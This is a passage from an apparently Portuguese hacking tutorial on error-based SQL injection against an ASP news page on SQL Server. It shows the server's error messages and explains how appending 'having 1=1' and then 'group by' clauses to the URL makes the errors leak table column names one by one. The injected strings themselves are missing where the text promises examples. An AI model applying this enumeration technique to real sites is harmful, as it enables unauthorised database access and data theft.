[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/noticias.asp, line 152
E agora e que fazemos depois de ter visto esta mensagem vamos colocar uma string na url para retornar msgs de erro do qual iremos descobrir os campos da tabela.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Cod_Noticia' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/noticias.asp, line 152
descobrimos o primeiro campo do banco de dados do site
para descobrirmos outros campos da tabela. iremos trocar o comando having 1=1 por group by agora ficando
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Noticias.Tit_Noticia' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/noticias.asp, line 152
voce pode ficar fazendo isto para pegar todos os campos da tabela, é so colocar a virgula entre os campos já encontrados,por exemplo: